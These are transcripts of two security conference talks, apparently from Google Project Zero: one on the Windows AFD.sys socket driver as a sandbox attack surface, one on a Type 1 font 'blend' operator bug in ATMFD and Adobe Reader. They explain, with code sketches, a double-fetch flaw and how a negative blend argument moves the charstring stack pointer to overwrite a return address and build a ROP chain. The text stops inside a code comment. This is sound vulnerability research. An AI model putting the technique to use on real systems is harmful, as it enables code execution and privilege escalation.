can have an AFD that is tuned for a client machine, the same code but tuned differently for a server machine or for a phone. So it receives all of these different configuration settings; things like buffer sizes were in there, which was interesting. There's whether you have raw security enabled: if you've ever tried to open a raw socket after XP Service Pack 2, you're going to get access denied unless you have a registry bit flipped, and there's one for AFD and also another one for TCPIP. So this is a common configuration setting for drivers. And then you actually see protocol-specific things coming from this configuration as well, things like the default send window, the TCP windowing, that you can actually adjust in your registry. And it's very easy to find all of these configuration values: you just run strings on the binary and you'll see all of them. This fills out an AFD config info structure that's referenced all over the place.
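For contrast with the user-mode path described above, this is roughly what the kernel-side WSK path looks like for a legitimate kernel client, the part the talk notes is not reachable from user mode. It is a minimal registration sketch using the documented WSK API; error handling, deregistration, and the actual socket creation are omitted.

#include <ntddk.h>
#include <wsk.h>

static WSK_REGISTRATION g_WskRegistration;
static WSK_PROVIDER_NPI g_WskProvider;

static const WSK_CLIENT_DISPATCH g_WskClientDispatch = {
    MAKE_WSK_VERSION(1, 0),   /* requested WSK version        */
    0,                        /* reserved                     */
    NULL                      /* no WskClientEvent callback   */
};

NTSTATUS AttachToWsk(void) {
    WSK_CLIENT_NPI clientNpi;
    clientNpi.ClientContext = NULL;
    clientNpi.Dispatch = &g_WskClientDispatch;

    /* Register as a WSK client, then capture the provider NPI; after this,
     * g_WskProvider.Dispatch->WskSocket() can create kernel-mode sockets. */
    NTSTATUS status = WskRegister(&clientNpi, &g_WskRegistration);
    if (!NT_SUCCESS(status))
        return status;

    return WskCaptureProviderNPI(&g_WskRegistration, WSK_INFINITE_WAIT,
                                 &g_WskProvider);
}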
Coming back to the registry configuration: the buffer sizes were the ones that caught my eye as a vulnerability analyst, because if you start a driver with a certain buffer size configuration and you can change that while it's running, well, one buffer size is not going to be the same buffer size between runs or between calls to it. Unfortunately, well, fortunately for security, the keys are appropriately secured: you have to be admin, and if you're already admin, there are a lot easier ways to escape a sandbox. Now, a few of these configurations are registered as volatile configurations, in that the driver registers a change notification on the registry, so it gets a callback when the registry key changes and reconfigures itself. Things like buffer sizes are not in that set, and the disable-raw-security flag was not in that set either, which is why you have to reboot after setting that flag if you want to make raw socket communications. So let's talk about inputs. This is really what matters when we're talking about what it does with the data we want to give it. Drivers usually receive inputs off of ioctls, and that is the majority of the case here. You can see that everything is set to an AFD dispatch routine, and there are a few different dispatch handlers; AfdDispatchDeviceControl is the one I focused on. There's a WSK dispatch for internal use only, an event-tracing dispatch, and then there's a fast I/O dispatch, which mostly maps back to the same device control handlers, and of course an unload routine, which is mandatory for drivers. It also registers for plug-and-play events, so when you plug in a new network card or a new infrared device, AFD is going to get a notification about that as well. And likewise, it is aware of the TDI layer, because that's what it is: it is a client to TDI just as it is a server for user mode, and it is aware of TDI address changes. So if a new device is plugged in and gets an address, AFD maintains a list of those addresses for use in other user-mode socket calls. And then, as things developed and Microsoft put RPC in the kernel, AFD was not immune from this either: it has several imports from MSRPC. I haven't reversed those yet, but RPC in the kernel really sounds like an interesting thing, doesn't it? So this is the big ioctl table. Again, it's easy to find: it's set up at the bottom of GsDriverEntry, and immediately after it are the numbers of the ioctls. So basically, the first entry in the ioctl table matches up with the first function, and those are the symbols if you wanted to go pull them. There's actually another level of indirection here. If you look at this, you can probably see that, I don't know if that projects well, these are all AfdDispatchImmediate, and they have different numbers associated with them, but it's always going to the same function. Basically, those are the ioctls that will always complete the request immediately; they don't return STATUS_PENDING. And this is where the fast-path things map to as well. Just as an example, there's another table here: off of that dispatch, there's another table that's referenced inside dispatch-immediate, and these map one-to-one, with nulls for the other ioctls that come in. Kind of interesting here as well is that you find there's overlap between the functions off of the fast path too: several of the ioctls for dispatch-immediate all point to get-context or set-context.
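The layout described here, one array of handler pointers with a parallel array of ioctl numbers right after it, is a common driver pattern, and a simplified version of the lookup looks something like the sketch below. The handler names and control codes are made up for illustration; they are not AFD's real ones.

#include <ntddk.h>

typedef NTSTATUS (*IOCTL_HANDLER)(PIRP Irp, PIO_STACK_LOCATION IrpSp);

/* Hypothetical handlers, stand-ins for the ~70 real AFD routines. */
NTSTATUS HandleBind(PIRP Irp, PIO_STACK_LOCATION IrpSp);
NTSTATUS HandleConnect(PIRP Irp, PIO_STACK_LOCATION IrpSp);
NTSTATUS HandleSend(PIRP Irp, PIO_STACK_LOCATION IrpSp);

/* Two parallel tables: Handlers[i] services Codes[i]. */
static const IOCTL_HANDLER Handlers[] = { HandleBind, HandleConnect, HandleSend };
static const ULONG         Codes[]    = { 0x12003,    0x12007,       0x1201F };

NTSTATUS DispatchDeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    UNREFERENCED_PARAMETER(DeviceObject);
    PIO_STACK_LOCATION sp = IoGetCurrentIrpStackLocation(Irp);
    ULONG code = sp->Parameters.DeviceIoControl.IoControlCode;

    for (ULONG i = 0; i < sizeof(Codes) / sizeof(Codes[0]); i++) {
        if (Codes[i] == code)
            return Handlers[i](Irp, sp);   /* the handler completes the IRP */
    }
    Irp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_INVALID_DEVICE_REQUEST;
}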
Those get-context and set-context handlers are for setting different kinds of information on the socket, and which kind is defined by the ioctl number. Right, so, static bug hunting. I mostly focused on Windows 7 x86. I wish I had started with Windows 8; the driver disassembles quite a bit more cleanly, and the symbols seem to match up and give better hints at what's going on. Mostly it was classic bottom-up analysis: I'm looking for memmove, memcpy, all of the dozen or so ExAllocatePool routines. All of those look interesting. There are probably 200 cross-references to these routines; you go look at one and ask, is there a way to make the buffer overflow with a long length, is the buffer appropriately sized, is it aligned properly? These are fairly well-documented techniques for finding bugs in kernel drivers, and it's just a manual slog through them. The other technique I like to use on drivers is to cross-reference __security_check_cookie. The compiler is kind enough to tell you that, oh, there are lots of stack operations here, lots of copying, a large stack buffer, so I'm going to put a cookie there and check it on the way out. If I go through all of those functions, I'm guaranteed to find good opportunities for vulnerability analysis. Likewise, functions with large stack buffers that may not have a cookie on them for one reason or another are also a target for analysis. And then the one that I really wish I had a solid automated story for, but don't, is object reference counting bugs. There are several instances where references are increased, and every code path that I did data-flow and control-flow analysis on showed that these were being used appropriately. So Microsoft did a really good job writing this driver. You could tell that it had been looked at manually, and you could tell that it had been fuzzed, just by going through it, and this is kind of indicative of the bugs that were coming out of it too. The bug last year was a dangling pointer reference, so that was an object reference issue. There are a couple of scripts I wrote that would automate checking return values, like when you call ExAllocatePool, do you verify that you got a valid pointer back? And there was one that caught me out for a little bit, the tag-priority variant, which actually doesn't return a bad value when it has a problem; it raises an exception, which is different from all of the other ExAllocatePool routines. So I went through all of the reachable ioctls. I did not go through WSK, and I did not go through SAN, because you have to have a SAN device enabled to reach a lot of those. They paid very good attention to data alignment and to proper size restrictions on any buffers you passed in. The majority of the ioctls are passed as METHOD_NEITHER. With METHOD_NEITHER, the I/O manager basically doesn't copy any of your data; you get pointers directly into user mode, and this is sort of the reason why you have a lot of bugs in win32k.sys, because many of those are also effectively METHOD_NEITHER and you can get into time-of-check/time-of-use bugs very quickly. So I manually checked for these as well, along with integer issues. The fuzzing bit: I banged my head against this for three or four weeks, and I had a frustrating time with it because I wasn't finding bugs. So when you get frustrated, you just throw all the crap at the thing and see what happens.
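The METHOD_NEITHER time-of-check/time-of-use concern boils down to the classic double-fetch pattern sketched below: the driver reads a length from the user buffer once to validate it and again to use it, so a user-mode thread flipping the value in between defeats the check. This is a generic illustration with made-up structures, not code from AFD, and the exception handling that should wrap the probes is omitted for brevity.

#include <ntddk.h>

typedef struct _REQUEST {
    ULONG Length;
    UCHAR Data[1];
} REQUEST, *PREQUEST;

/* VULNERABLE pattern: with METHOD_NEITHER, the pointer still refers to user
 * memory, so Length can change between the check and the use. */
NTSTATUS HandleRequestBad(PVOID UserBuffer, PUCHAR KernelBuf, ULONG KernelBufSize) {
    PREQUEST req = (PREQUEST)UserBuffer;

    ProbeForRead(req, sizeof(REQUEST), 1);
    if (req->Length > KernelBufSize)                     /* time of check */
        return STATUS_INVALID_PARAMETER;

    RtlCopyMemory(KernelBuf, req->Data, req->Length);    /* time of use   */
    return STATUS_SUCCESS;
}

/* Safer pattern: capture the value once into kernel memory, then only ever
 * use the captured copy. */
NTSTATUS HandleRequestGood(PVOID UserBuffer, PUCHAR KernelBuf, ULONG KernelBufSize) {
    PREQUEST req = (PREQUEST)UserBuffer;

    ProbeForRead(req, sizeof(REQUEST), 1);
    ULONG length = *(volatile ULONG *)&req->Length;      /* single fetch  */
    if (length > KernelBufSize)
        return STATUS_INVALID_PARAMETER;

    ProbeForRead(req->Data, length, 1);
    RtlCopyMemory(KernelBuf, req->Data, length);
    return STATUS_SUCCESS;
}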
So I wrote up a quick fuzzer, and I had a pretty good understanding of what the driver was actually doing with the ioctls and what the limits were, for example that you couldn't pass in more than 256 bytes for an AFD bind request. So I built that knowledge into the fuzzer when I went to fuzz the object, so it wasn't wasting a whole lot of time fuzzing things that would be kicked out at first glance by the function. And this is my preference: I usually like to do static analysis over fuzzing, because you get a better understanding, and if you're going to go the route of fuzzing, I would encourage you to do static analysis first, because I think you're going to write a better fuzzer in the end, having some knowledge of what it's doing. So I had two weeks of fuzz time on it. I did not scale it; I had a single core running, basically two VMs, one running my fuzzer and one running a kernel debugger attached back to it, so if an exception happened I would catch it and be able to analyze it in real time. It was a kind of simple fuzzer with maybe one little novel technique: it would hit all of the ioctls, and it would then have the buffers that were passed into these ioctls mutated by a separate user-mode thread, so that we could attempt to find these time-of-check/time-of-use bugs. Now, there's a race condition there that you're not likely to win unless you align things on page boundaries, but if you were going to scale this, I think you're likely to hit it at least once or twice. So the fuzzer did not turn up anything, which was not terribly surprising given the quality of the code, but we did at least have a poke at it. For a little bit of future work: it's really interesting that you can have this sandbox where you can't make socket calls, yet it is technically possible to write a native AFD library. And I say native: you could link in an afd_socket, and even though you don't have the whole Winsock framework supporting you, so long as you can talk to this driver in the right way, you'll be able to get socket communications out of a sandbox with it. And you could compile this right into shellcode. The really cool thing about doing something like this is that it would provide feedback into a more intelligent fuzzer: instead of fuzzing with raw ioctl calls, you then fuzz off of the library. That's something that was about half implemented before we stopped research on this. The intent was to provide some level of assurance that AFD is not going to fall over with three or four weeks of analysis. I think we could fuzz better; we could fuzz at scale and we could build out the data structures that it's expecting a little bit more. And if it's useful, and I don't know how many devices are out there that have SAN access on them, we could fuzz the SAN functions as well. So that's my talk. It is a 30-minute talk, so a kind of short, brief intro into Winsock and AFD. Big thanks to Google and Project Zero and James Forshaw for supporting this research and encouraging me along the way. Happy to take any questions that you have about Project Zero, AFD, anything along those lines. No heckling? Yes. Oh well. Mike. I just wanted to ask, out of personal curiosity: have you tried to do this kind of research with NDIS or the Winsock Kernel driver? No.
So we were not so much interested in that under the sandbox sort of focus. Okay, thank you. There's one behind you. Hi, I have, I guess, a general question that goes with what you guys are doing. Do you document your fuzzers at all, or provide any frameworks or baselines for what you're doing there? Yeah. So we've certainly released fuzzers to Microsoft in the past. We've released, well, not Project Zero specifically, but team members on Project Zero have released, open-source fuzzers. Our experience is that they've largely sat on the shelf, so it's not something we strive to do. If it is requested, certainly we can release them. I think for this one in particular, if we're going to go back to it, I'd focus on the native AFD library first and then build a fuzzer around that, and possibly release both. Okay. Thank you very much.
|
What happens when you make a socket() call in Windows? This presentation will briefly walk through the rather well documented Winsock user-mode framework before diving into the turmoil of ring 0. There is no map to guide us here. Our adventure will begin where MSDN ends, and our first stop along the way is with an IOCTL to AFD.sys, the awkwardly named ancillary function driver. This driver is of particular interest because it is so widely used and yet most people that use it do not even know it exists. Nearly every Windows program managing sockets depends on this driver. Even more interesting is that the device created by AFD.sys is accessible from every sandbox Google Project Zero looked at. In fact, there isn't even support to restrict access to this device until Windows 8.1. Staying true to Windows style, AFD.sys is a complex driver with over 70 reachable IOCTLs and support for everything from SAN to TCP. It is no wonder that this driver weighs in at 500KB. This complexity combined with accessibility breeds a robust ring 0 attack surface. Current fuzzing efforts will also be shared in this presentation, and by the time we are done you should have a good idea of what happens when making a socket() call without having to spend hours in IDA to figure it out.
|
10.5446/32820 (DOI)
|
Okay, thank you. So welcome to my talk. Today we will be talking about fonts again. This is the second font stock at recon. But it's not about GTF, but it's about post-tripped fonts and specifically about the research that I performed regarding post-tripped font security. So about myself, I also work on project zero, similar to Steve. I am passionate about low-level software security, as you will see. I also play CDFs. I am the vice captain of Dragon Sector. And I have a blog and Twitter. I don't post there very often. But I will definitely put the slides and some additional details about the research, which is by the way quite extensive. So in this talk, I am only actually talking about the exploitation of one epic bug that I found. But there are more bugs. And I think all of them are quite interesting. So I will be following up with some additional information about all of those findings later on. So if you are interested in the stock and the details, then be sure to check these things. So today we will talk about, first we will talk about the general structure of type one and open type fonts. Then we will talk about what Adobe type manager font driver is in the Windows kernel and what other code bases also share the same code, because this is actually going to be quite an important part of the talk. And then we will talk about exploitation of one specific vulnerability, which has two CVs assigned to it, but it is actually one bug. First we are going to own Adobe reader 11 on Windows 8.1 30-bit. And then we are going to do the same thing on 64-bits with the help of another vulnerability. And then I will provide some final thoughts. So let's start with a very short primer of post script fonts. Basically, they now have over 30 years. Adobe introduced them in 1984. Actually, they introduced two types of post script fonts, type one and type three fonts. The first type makes it only possible to use a subset of the post script functionality and type three fonts can use all of it. And type one fonts are actually the common formats that we are going to talk about. And they were all originally closed formats. Adobe only released a specification after a few years after Apple started working on a competition format called TrueType. So the general structure of the type one fonts is very simple. It's basically like a post script file containing dictionaries and primitive types, such as integers, numbers, real numbers, and some other stuff. And they also have some nested dictionaries. And overall, it just basically specifies it's just several numbers specifying the properties of the font. And apart from this, in type one fonts, you also have something called char strings. This is going to be a word that I'm going to be using a lot today. And char strings are basically like post script programs that are used to actually draw all of the outlines of a glyph. So here you can see an example of char string, which consists of immediate values that are pushed on the post script stack and also some operations that are being performed using those values. So overall, this char string draws the add character in one of the fonts that I took. So overall, the execution context of char strings in type one consists of three main parts. We have the instruction stream, which is basically like a buffer with all of the instructions that are encoded inside of the type one file. Then we have something called the operant stack, which is basically the stack that we also have in post script. 
In Type 1, it is able to store up to 24 numbers, which are 32-bit. Interestingly, charstring instructions actually use different parts of those values: some of them use the full 32 bits and some use only 16 bits. We also have something called the transient array, which is also going to be very useful to us today. It's not a stack; it's just an addressable helper array that we can control to some degree: we can control its length using a numeric value inside the dictionary, and we can also initialize it using a BuildCharArray entry in the Private dictionary of the font. It's not really documented anywhere that I know of, but still, most interpreters implement it, which probably means that some font started using it and the projects were forced to implement it. When it comes to the operators themselves, the instructions, we have several types. They are mostly about just drawing the glyphs, but there are also some arithmetic commands and subroutine commands, because there are subroutines in Type 1. And we can also just push values to the stack using the byte range 32 to 255, with the length of the instruction varying in order to be able to encode the full 32-bit range; I'll show a small sketch of that encoding below. So here we can see a short excerpt of the operators that are available in Type 1 fonts, taken from the official specification. There aren't too many of them, and as you can see, most of them are related to just drawing lines and other stuff like that. We have one interesting arithmetic instruction, which is called div. And in general we have an escape instruction which can encode some more interesting operators that didn't fit into the original encoding. As you could see, some of those IDs were missing. It's kind of weird to look at this list, but the reason is that between the time the specification was released and today, it was actually evolving very dynamically: the specification changed, introducing some operators and removing some others. That is basically the reason for this. Another interesting property of Type 1 fonts is that there have to be at least two files in order to load them, at least on Windows. We need a PFB file, which is basically the core of the font, and we have the PFM file, which is the metrics file. There is also a third, optional file that is related to Multiple Master fonts. So, just a brief introduction to Multiple Master fonts: they are an extension of Type 1 fonts that Adobe introduced several years after Type 1. They make it possible to specify two or more masters that you can interpolate between, to be able to get different results and not be dependent on one specific shape of the glyph, but have it more dynamic. This is an example of how that would look. Multiple Master fonts were first supported in Adobe Type Manager, released in 1990, which was, by the way, also the first program to properly rasterize Type 1 fonts, which is kind of obvious, because Adobe was the inventor of the format. And Multiple Master fonts weren't really adopted worldwide, partially due to the advent of OpenType, so there are only a couple of Multiple Master fonts in existence anywhere in the world, mostly created by Adobe itself. However, the interesting thing is that they are still supported by Microsoft GDI, meaning by ATMFD in the kernel, and also by Adobe Reader.
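As a concrete illustration of the variable-length number encoding just mentioned, here is a small C sketch of how a Type 1 charstring interpreter decodes operand bytes in the 32 to 255 range, following the ranges given in the published Type 1 specification; error handling and bounds checking are omitted.

#include <stdint.h>

/* Decode one Type 1 charstring number starting at p; returns the number of
 * bytes consumed and stores the decoded value in *out. Bytes 0..31 are
 * operators, not numbers, and are handled elsewhere. */
static int decode_t1_number(const uint8_t *p, int32_t *out) {
    uint8_t v = p[0];
    if (v >= 32 && v <= 246) {              /* one byte:   -107 .. 107        */
        *out = (int32_t)v - 139;
        return 1;
    } else if (v >= 247 && v <= 250) {      /* two bytes:   108 .. 1131       */
        *out = (int32_t)(v - 247) * 256 + p[1] + 108;
        return 2;
    } else if (v >= 251 && v <= 254) {      /* two bytes: -1131 .. -108       */
        *out = -((int32_t)(v - 251) * 256) - p[1] - 108;
        return 2;
    } else {                                /* v == 255: full 32-bit integer  */
        *out = (int32_t)(((uint32_t)p[1] << 24) | ((uint32_t)p[2] << 16) |
                         ((uint32_t)p[3] << 8)  |  (uint32_t)p[4]);
        return 5;
    }
}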
When it comes to OpenType, it was released by Microsoft and Adobe, who worked together to create something that would supersede both TrueType and Type 1 fonts. And it's basically more of the same. There are several major differences: only one file is required instead of two in order to load the font; the previously textual data, such as the dictionaries at the beginning of the file, was converted into a compact binary form so it consumes less space; and the charstring specification, which is the most important part, was significantly extended. They introduced a lot of new instructions and also deprecated or removed some of them. Here you can see the list of operators from the OpenType specification; there are a lot more. Specifically, they introduced a lot of new instructions for drawing glyphs and for hinting, so that fonts render nicely at small point sizes. But there are also several new instructions that are very interesting, possibly from the exploitation standpoint, because there are new arithmetic and logic instructions such as and, or, not, absolute value, addition, subtraction and so on. We also have some new instructions for managing the stack, so we can duplicate the top stack value, exchange values on the stack, get a value from a specific index on the stack, and so forth. There are also some very weird instructions, such as the random one, which is supposed to insert a random number onto the operand stack; I don't really know why a font would want any nondeterministic step inside a charstring, but it is in the documentation. So that's mostly the interesting stuff. And if we look at the very end of the OpenType specification, there is a very interesting table which specifies all of the limits for all of the structures that should be used when implementing OpenType and charstrings. That is actually a very good starting point for vulnerability hunting: we can verify that all of those limits are actually followed by the implementation we are looking into. So now let's look at the Adobe Type Manager software. Basically, it was created by Adobe to render Type 1 fonts, and it was ported to very early versions of Windows by patching into a very low level of the operating system in order to provide kind of native support for them. But the Windows architecture later made it impossible to keep doing it that way. So at first Microsoft would allow converting Type 1 fonts into TrueType during system installation, and later on, in Windows NT 4, they added ATM as a third-party font driver called ATMFD.DLL, and it's there until today, still in Windows 8.1, rasterizing our PostScript fonts. So why am I talking about all of this? Well, basically, due to the vast collaboration between vendors during the early days of font development: if one vendor created an implementation of a specific format, they would often share it with the other vendors in order to make sure it would be widely adopted. That's also what happened with Adobe: they licensed the code to Microsoft as ATMFD, and Microsoft used the code in Windows GDI, so the Windows kernel uses this to render the fonts.
There is also the DirectWrite library, which is a user-land library that renders fonts and is used, for example, in web browsers such as Internet Explorer, Chrome, Firefox, et cetera. There is also Windows Presentation Foundation, which uses the code, and there is obviously Adobe Reader, by Adobe itself, which also has the same common ancestor as all of those other products. The important part is that if we find a single bug in the PostScript font implementation, OTF or Type 1, then it's very likely that this bug, or some other bugs, might be common across the other products. This is kind of scary from a security standpoint. But there is some good news: if you think about it, it's only the common ancestor of those different code bases that is shared; it's not really the same branch. It's been living in different branches, maintained by different groups of people, for many, many years, and it has received a varying degree of attention from the security community, because some people only look for bugs in the Windows kernel and probably aren't checking whether the same bugs apply to Adobe Reader, for example, because they are not interested in that. So the good news is that they don't all have to be affected by the exact same set of bugs, right? But this is also bad news, and I think it's more bad news than good news, because you could actually take all of those different code bases, cross-diff them, check which sanity checks exist in some of them and not in the others, and derive real zero-days from that. So it's not a very good situation. What I decided to do was manually audit the charstring state machine implemented in Adobe Type Manager and see if I could find anything there, and maybe something that would also reproduce in other software. So let's start with a quick primer on reverse engineering ATMFD. The first thing you see once you load it in IDA is that it doesn't have symbols available from the Microsoft symbol server, because it's basically not Microsoft's own code, so they don't make the symbols available. We unfortunately have to stick with unnamed sub_address names or whatever, so there's quite a bit of interesting information that we're missing. I suspect this might be a reason why it was less thoroughly audited compared to Win32k, which has all of the symbols available, because the entry bar is quite a bit higher. But if we think about it, and if we recall that there are shared code bases, maybe we can take advantage of the fact that DirectWrite and Windows Presentation Foundation share the same code. Maybe we could see what the symbols are in those libraries and then somehow put them to work with ATMFD. It's definitely possible, and we can do it for some functions, but there's another very interesting way, which is something that Halvar Flake noticed. The thing is that Adobe, a long time ago, actually released some builds of Reader with debug symbols enabled: it was Reader 4 for AIX and Reader 5 for Windows. This also included the font engine, CoolType. And since the code, even though it is very, very old right now, hasn't really changed fundamentally, there are many symbols that you can just take from the old CoolType and put into ATMFD, and they will work, because the functions are very similar. So yeah. These are several function names from the old version of CoolType that are quite useful.
And there is also a bright side: there are some things in ATMFD that help us in reverse engineering it. First of all, there are a lot of debug messages. They are not really printed out; there aren't any debug print function calls, but there are function calls that are essentially stubs that could have been enabled, and probably are enabled in some debug builds, but they are not enabled in the release builds. The debug strings are still there, though. So we have things like variable names, both local and global; we have some function names; we have the conditions that ATMFD wanted to be met but that weren't met, in the case of some assertions; we also have some source file paths, and stuff like that. It's a lot of useful information. And there are also Type 1 font string literals, the names of the fields that are expected in the dictionaries of Type 1 fonts. You can see some of them here; there are really a lot of them, and they are very useful. So if we want to find the single function, the interpreter that does all of the charstring processing, it's really not a very difficult task, because first of all it has a lot of cross-references to debug messages which are directly related to charstrings, as you can see here: for example, messages about operand stack overflow or underflow, or complaints about the argument count of a named charstring operator. And second of all, if you look at the list of functions, this function is actually the largest one in the file: it is over 20 kilobytes, roughly five times larger than the second largest function in the file. So it's really enormous. It looks like this in IDA, and I actually had to increase the maximum number of nodes that IDA would be willing to render as a graph, because 1,000 wasn't enough. If we want confirmation that this is actually the right function, we can take a look at DirectWrite or Windows Presentation Foundation and see that the name of the function is something like Type1InterpretCharString, or, in the symbolized CoolType, DoType1InterpretCharString. And what the function is, as you could also see in the graph before, is a giant switch-case statement handling all of those different instructions inline inside this one function. So it's quite simple in general: it basically reads a byte of the charstring and then evaluates the switch-case expression. One other important thing is that the PostScript operand stack, which in OpenType is 48 elements long, is also on the local stack of the interpreter function. It's called op_stk, for operand stack, and this is the name used in the debug messages from ATMFD, so I know for sure that it was like that in the source code. We also have a pointer to it, called OPSP, which at the beginning of the function obviously points at the beginning of the array. And the array is in the same stack context as the return address, the other stack frames, and stuff like that. So the question, a very important question, is: why is the function so large, right? Because there aren't that many instructions. Well, first of all, the function is responsible for executing both Type 1 and Type 2 charstrings, Type 2 being the OpenType ones, so it is used for both of them. And this could be useful, because Type 1 fonts now effectively have access to all of the OpenType instructions, and vice versa.
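The shape of the interpreter described here, one local operand-stack array, a pointer into it, and a giant switch over opcode bytes, can be sketched roughly as follows. This is my simplified reconstruction for illustration, not ATMFD's actual code, and it reuses the decode_t1_number helper sketched earlier. The detail that matters for what follows is that the array lives in the same stack frame as the saved registers and the return address.

#include <stdint.h>

#define OP_STACK_SIZE 48              /* OpenType limit for the argument stack */

int decode_t1_number(const uint8_t *p, int32_t *out);    /* as sketched above */

enum { OP_RLINETO = 5, OP_ENDCHAR = 14 };   /* a couple of real opcode values */

int interpret_charstring(const uint8_t *cs, const uint8_t *end) {
    int32_t op_stk[OP_STACK_SIZE];    /* operand stack, in this stack frame,  */
    int32_t *op_sp = op_stk;          /* next free slot; lives right next to  */
                                      /* the saved registers / return address */
    while (cs < end) {
        /* Only the lower bound is enforced at the top of the loop; there is
         * no matching check that op_sp has not moved past the end of op_stk. */
        if (op_sp < op_stk)
            return -1;

        uint8_t b = *cs++;
        if (b >= 32) {                /* operand byte: decode and push        */
            int32_t value;
            cs += decode_t1_number(cs - 1, &value) - 1;
            if (op_sp >= op_stk + OP_STACK_SIZE)   /* pushes do check the top */
                return -1;
            *op_sp++ = value;
            continue;
        }
        switch (b) {                  /* operator dispatch, all inlined       */
        case OP_RLINETO:
            /* consume operands, emit a line segment; path ops clear the stack */
            op_sp = op_stk;
            break;
        case OP_ENDCHAR:
            return 0;                 /* finishes the glyph, leaves the loop  */
        default:
            /* dozens more cases, including escape-prefixed operators         */
            break;
        }
    }
    return 0;
}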
The other reason the function is so large is that ATMFD actually implements every single feature that was ever part of any of the Type 1 or OpenType specifications. Even if a given feature was only there for a year or two and has long been forgotten, ATMFD still supports it, even the most obsolete, deprecated or forgotten ones. So I was really enthusiastic when I learned about all of this, because it's basically the perfect starting point for a vulnerability researcher. I just want to sum up the findings I had during this research, because I'm not going to be talking about all of them. There were some quite low-severity bugs that were just DoSes in ATMFD or small memory disclosures. There was also a very interesting memory disclosure that affected all of those code bases, so you could use that one bug to disclose memory from the heap of Internet Explorer, Adobe Reader, and the Microsoft Windows kernel; another one bug to rule them all. And there were also quite a few high-severity bugs, which could lead to remote code execution or elevation of privileges in the Windows kernel. The three most important ones were found in both Adobe Reader and the Windows kernel, including the one that I am going to talk about, the bottom-most one. So yeah, let's look into the bug. Basically, it allowed remote code execution in Adobe Reader and elevation of privileges in the Windows kernel, or perhaps also remote code execution in the Windows kernel as well. Unfortunately, it only affected 32-bit platforms, but as we will see, that might not really be a huge problem. And it was reproducible with just Type 1 fonts, but Adobe Reader and the Windows kernel support Type 1 fonts, so that's not a problem either. In order to understand the vulnerability, we have to look at the operator it is in: the blend operator. That's why I call the bug itself the blend vulnerability. It's related to the forgotten Multiple Master fonts. The blend operator itself was introduced in 1998, and it was only there for about two years; then it was deleted, but obviously ATMFD still has support for it. I'm not going to talk about the details of what it does on a logical level, but for us it's important that it pops K times N arguments from the operand stack, where K is the number of master designs, which is equivalent to the length of the WeightVector table specified in the Private dictionary, and N is a controlled, signed 16-bit value which is loaded from the operand stack. So it pops a semi-controlled number of arguments from the stack and then pushes N values back. If you look at the code, you can actually see that the interpreter, or rather the developer, had every intention to verify that the specified number of arguments is present on the stack and that everything will go fine. There is a check whether the stack pointer is within the bounds of the stack buffer itself, a check whether there is at least one item on the stack (the N value that we're going to pop), a check whether there are enough items on the stack, and a check whether there is enough space to push the N values back onto the stack later on. And you can also see verbatim what some of those conditions were, because they appear in the debug messages as well. But it turns out that even though they made a lot of effort to check all of those conditions, they missed one corner case, which is a negative value of N.
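In pseudo-C, the intent and the flaw look roughly like this. This is a reconstruction in spirit of the logic as described in the talk, not Adobe's or Microsoft's actual source; the popping of n itself and the blending arithmetic are omitted for clarity.

#include <stdint.h>
#include <stddef.h>

#define OP_STACK_SIZE 48

/* k is the number of master designs (the WeightVector length, at most 16). */
int handle_blend(int32_t *op_stk, int32_t **op_sp_ptr, int k) {
    int32_t *op_sp = *op_sp_ptr;

    if (op_sp < op_stk || op_sp > op_stk + OP_STACK_SIZE)
        return -1;                              /* pointer within the buffer   */
    if (op_sp - op_stk < 1)
        return -1;                              /* at least the n operand      */

    int n = (int16_t)op_sp[-1];                 /* signed 16-bit, controlled   */

    if (op_sp - op_stk < (ptrdiff_t)n * k)
        return -1;                              /* "enough arguments": a       */
                                                /* negative n sails through    */
    if ((op_stk + OP_STACK_SIZE) - op_sp < (ptrdiff_t)n)
        return -1;                              /* "room for results": same    */

    /* DoBlend(): pop k*n arguments, blend, push n results. Net effect:        */
    op_sp -= (ptrdiff_t)(k - 1) * n;            /* n < 0 moves op_sp FORWARD,  */
                                                /* past the end of op_stk      */
    *op_sp_ptr = op_sp;
    return 0;
}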
So a negative value of N passed all of those checks and reached the DoBlend function, which did the three things I described before: it loaded the input parameters from the stack, did some computation called the blending operation, and pushed the resulting values back. From a technical point of view, what happens is just that OPSP is decremented by this expression; the times 4 obviously comes from the fact that 4 is the size of an operand on the stack, and yeah, it's all pretty trivial. So what happens for a negative N is that no actual popping or pushing takes place in the DoBlend function, but the operand stack pointer is still adjusted according to the formula I've shown. With a controlled 16-bit N, we can therefore arbitrarily move the stack pointer beyond the operand stack array. And that is a security boundary, because normally the pointer should always stay within that local array. It turns out we're quite lucky, because even though we can do this, at the beginning of the main interpreter loop there is only a check whether OPSP is not smaller than the base of the operand stack array, and if it is, execution is aborted; there is no similar check for whether OPSP is larger than the end of the operand stack, that is, whether it has gone out of bounds from the other side. Thanks to this, we can keep this inconsistent state, with an out-of-bounds pointer, and still execute further instructions, which is very good. So what can we do with this? The maximum length of the WeightVector is 16, so if we set it to 16 values, we can shift the operand stack pointer by as much as almost two megabytes up the stack, which is well beyond the stack area itself; we could maybe point it somewhere else entirely, such as the heap, the pool, executable images, and so on. But if we set the WeightVector to an array of length two, then we get very fine granularity of control over the pointer: if we just issue a two-instruction sequence, push minus X then blend, we can set OPSP to any offset relative to the operand stack with a granularity of four bytes. For example, if we look at the stack frame of the interpreter function, the difference between the beginning of the operand stack array and the return address is 349 DWORDs. So if we push minus 349 and then perform the blend operation, the pointer goes out of bounds; if we then perform the exchange operation, exchanging the two top values on the stack, we simply flip the return address and the saved EBP value; and if we then issue an endchar command, we force the return from the interpreter function, and obviously everything goes bad. We get a blue screen of death showing that the processor tried to execute non-executable memory, which is the stack. So this is obviously quite bad. But it gets even better, because it turns out that we can use all of the supported charstring operators, such as addition, subtraction and the other arithmetic stuff, and this is pretty much sufficient to create a full ROP chain using just charstrings. As a result, the bug enables the creation of a 100% reliable, charstring-only exploit which subverts basically all modern exploit mitigations: stack cookies, obviously, because you can control where on the stack you modify data; DEP and ASLR, because you can just build a ROP chain for yourself; SMEP, et cetera.
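Before moving on, the displacement arithmetic from a moment ago is worth writing out. Each blend moves the operand stack pointer by 4*(k-1)*n bytes, so the two example figures quoted above fall straight out of the formula. This is my own worked check of those numbers, not code from the exploit.

#include <assert.h>
#include <stdio.h>

/* Bytes subtracted from the operand stack pointer by one blend: it pops k*n
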